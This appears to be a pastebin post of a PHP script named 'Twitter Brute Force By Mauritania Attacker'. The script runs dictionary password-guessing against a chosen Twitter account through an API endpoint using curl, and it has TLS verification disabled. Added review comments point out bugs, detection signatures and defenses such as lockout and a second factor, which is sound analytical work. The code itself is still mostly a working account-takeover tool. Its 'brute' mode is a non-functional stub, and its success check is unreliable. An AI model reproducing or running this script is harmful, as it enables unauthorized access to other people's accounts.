[PHP] Twitter Brute Force


SUBMITTED BY: Guest

DATE: Nov. 9, 2013, 3:33 p.m.


  1. <?php
  2. /////////////////////////////////////////////////////
  3. ////Twitter Brute Force By Mauritania Attacker//////
  4. ///////////////////////////////////////////////////
  5. ///////////////////////////////////////////////////
  6. ////Changing Description won't make you the Coder/
  7. /////////////////////////////////////////////////
  8. ////////////////////////////////////////////////////////////////////////////
  9. # This script was created to Brute Force Twitter Logins,#
  10. #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
  11. ///////////////////////////////////////////////////////////////////////////
  12. $dic ="pass.txt"; // wordlist path, relative to the working directory; read with file() in the dictionary branch
  13. //////////////////////////////////////////////////////////////////////////
      // Prints the operator page as one literal string: a POST form with a text field named
      // 'username' and two submit buttons that share the name 'attack' (values 'dictionary' and 'brute').
      // NOTE(review): nothing in this file authenticates the person submitting the form, so anyone
      // who can reach the script can make the hosting server send the login requests below.
  14. echo "
  15. <title>Twitter Brute Force By Mauritania Attacker</title>
  16. </head>
  17. <style type='text/css'>
  18. body {
  19. font:Verdana, Arial, Helvetica, sans-serif;
  20. font-size:12px;
  21. border-color:#FFFFFF;
  22. }
  23. .raster_table {
  24. background-color:BLUE;
  25. border-color:#CCCCCC;
  26. }
  27. .alert {
  28. color:#FF0000;
  29. }
  30. </style>
  31. <body>
  32. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  33. <tr>
  34. <td>
  35. <div align='center'><b>Twitter Brute Force [PHP] By Mauritania Attacker</b></div>
  36. </td>
  37. </tr>
  38. </table>
  39. <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
  40. <tr>
  41. <td>
  42. <div align='center'>
  43. </div>
  44. </td>
  45. </tr>
  46. <tr>
  47. <td>
  48. <div align='center'>
  49. </div>
  50. </td>
  51. </tr>
  52. <tr>
  53. <td>
  54. <div align='center'>
  55. <form method='post'>
  56. Target User:<br>
  57. <input name='username' type='text' /><br><br>
  58. <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>
  59. </form>
  60. </div>
  61. </td>
  62. </tr>
  63. <tr>
  64. <td>
  65. <div align='center'>
  66. </div>
  67. </td>
  68. </tr>
  69. </table>
  70. ";
  71. // Sets variables and retrieves the endpoint's response to a request without credentials, kept as the "failed login" baseline
      // NOTE(review): the fixed header set below (Firefox 23 User-Agent, French Accept-Language,
      // "Accept-Encoding: text") is reused for every request in this file, which makes it a usable
      // signature when searching authentication logs for this tool.
  72. if(isset($_POST['attack']) && isset($_POST['username'])) {
  73. $username = $_POST['username']; // taken verbatim from the request; later concatenated into a URL and into HTML without escaping
  74. $headers = array(
  75. "Host: stream.twitter.com",
  76. "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0",
  77. "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  78. "Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3",
  79. "Accept-Encoding: text", # No gzip, it only clutters your code!
  80. "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
  81. "Date: ".date(DATE_RFC822)
  82. );
  83. $c = curl_init('https://stream.twitter.com/1/statuses/filter.json'); // same endpoint as check_correct(), but with no credentials in the URL
  84. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // let libcurl use whichever HTTP auth scheme the server offers
  85. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
  86. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // return the body as a string instead of printing it
  87. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // follow redirects
  88. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); // certificate chain verification is disabled: the server's identity is not checked
  89. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); // NOTE(review): libcurl documents 2 as the value that enforces hostname matching; confirm what 1 does on the installed version
  90. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // keep sending credentials after a redirect to another host (none are set on this handle)
  91. $wrong = curl_exec($c); // baseline body, or false if the transfer fails; read as a global by check_correct()
  92. curl_close($c); // Close the curl stream
  93. }
  94. //Dictionary Attack: submits each line of the wordlist named in $dic for one account, sequentially, from this host
      // NOTE(review): on the service side this appears as a run of failed authentications for a
      // single account from one source; per-account throttling or lockout and a second factor
      // are the controls that limit it.
  95. if($_POST['attack'] == "dictionary") { // read outside the isset() guard above, so a request without 'attack' raises an undefined-index notice here
  96. $Dictionary = file("$dic"); // loads the whole wordlist into an array, one element per line; a false return (unreadable file) is not checked
  97. for ($Position = 0; $Position < count($Dictionary); $Position++) {
  98. $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]); // as written, removes the two-character sequence "rn" from the entry
  99. if(check_correct($username, $Dictionary[$Position])) { // on a reported match, die() below prints the candidate and $username into the page unescaped and stops
  100. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  101. <tr>
  102. <td>
  103. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  104. </td>
  105. </tr>
  106. </table>
  107. </body>
  108. </html>");
  109. }
  110. }
  111. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  112. <tr>
  113. <td>
  114. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar
  115. y attack.</b></div>
  116. </td>
  117. </tr>
  118. </table>";
  119. }
  120. //Brute Attack: placeholder only; both arms of the conditional below assign the same literal "a", so no candidate space is generated
  121. elseif($_POST['attack'] == "brute") {
  122. for ($Pass = 0; $Pass < 2; $Pass++) {
  123. if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
  124. if(check_correct($username, $Pass)) { // the message below prints $Dictionary[$Position], which this branch never sets
  125. die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  126. <tr>
  127. <td>
  128. <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
  129. </td>
  130. </tr>
  131. </table>
  132. </body>
  133. </html>");
  134. }
  135. }
  136. echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
  137. <tr>
  138. <td>
  139. <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for
  140. ce attack.</b></div>
  141. </td>
  142. </tr>
  143. </table>";
  144. }
  145. echo "</body>
  146. </html>";
  147. // check_correct(): reports whether a username/password pair produced a response that differs from the baseline
       // $username, $password - strings concatenated, unencoded, into the userinfo part of the request URL.
       // Returns true when the response body is not loosely equal (!=) to the global $wrong, false otherwise.
       // NOTE(review): "differs from the baseline" is the only success signal, so a failed transfer
       // (curl_exec() returns false), a throttling page or any other changed body can also be
       // reported as a match; treat the tool's output as unverified.
       // NOTE(review): the target is a versioned API path using HTTP auth credentials, not the
       // interactive login form; API and legacy auth paths need the same throttling, lockout and
       // second-factor enforcement as the main login.
  148. function check_correct($username, $password)
  149. {
  150. global $wrong, $headers; // both are set only inside the isset() guard at top level
  151. $c = curl_init('https://'.$username.':'.$password.'@stream.twitter.com/1/statuses/filter.json'); // values are not URL-encoded, so reserved characters in either one alter how the URL is parsed
  152. curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // let libcurl use whichever HTTP auth scheme the server offers
  153. curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
  154. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // return the body as a string instead of printing it
  155. curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // follow redirects
  156. curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); // certificate chain verification is disabled, so the credentials can reach an endpoint whose identity was never checked
  157. curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); // NOTE(review): libcurl documents 2 as the value that enforces hostname matching; confirm what 1 does on the installed version
  158. curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // combined with FOLLOWLOCATION, the credentials are re-sent to whatever host a redirect points to
  159. $str = curl_exec($c); // response body, or false if the transfer fails
  160. curl_close($c);
  161. if($str != $wrong) {return true;}
  162. else {return false;}
  163. }
  164. ?>
